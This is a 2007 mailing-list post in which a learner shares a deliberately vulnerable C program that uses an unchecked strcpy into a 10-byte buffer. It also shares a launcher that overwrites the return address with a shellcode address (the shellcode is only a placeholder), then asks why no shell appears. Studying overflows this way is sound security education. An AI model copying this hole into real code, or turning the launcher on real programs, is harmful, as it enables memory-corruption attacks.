Vulnerability Development mailing list archives
Re: Re: understanding buffer overflows
From: secacc7 () hotmail com
Date: 2 Nov 2007 08:35:57 -0000
thx.. this was a great example. yesterday i posted a replay with a different email address so i think, it was not acceptet. i edited your exampleas followed(maybe it was a bit different, im now at work..) vuln.cpp: #include <stdio.h> #include <string.h> int foo(char *a) { char buffer[10]; strcpy((char *)buffer,a); return 0; } int main(int argc, char * argv[]) { foo(argv[1]); return 0; } test.cpp: #include <stdio.h> int main() { char shellcode[]="Your provided shellcode"; printf("Address of Shellcode:%p\n",&shellcode); char buffer[20]; //to put the address of shellcode at the correct position of buffer ( i ve stack randmoization on i thik so its not static) - in my case i thing it was "14" //dont no the currect conversation: *(long *)&buffer[14]=(long *)&shellcode; execlp("./vuln", "vuln", buffer, NULL); } ant this worked fine: after execute (./test) I get a result like this: Address of shellcode: 0xbffff0c0 and gdb says too that eip points to 0xbffff0c0 i think this looks good - does it? anyway, i didnt get a new instance of the shell. if think maybe the shellcode havnt worked. greets michael!
Current thread:
- Re: understanding buffer overflows 3APA3A (Nov 01)
- <Possible follow-ups>
- Re: understanding buffer overflows adimitro (Nov 01)
- Re: Re: understanding buffer overflows ma (Nov 02)
- Re: Re: understanding buffer overflows secacc7 (Nov 02)
- Re: understanding buffer overflows Ben Petering (Nov 05)
- Re: understanding buffer overflows Chris Eagle (Nov 05)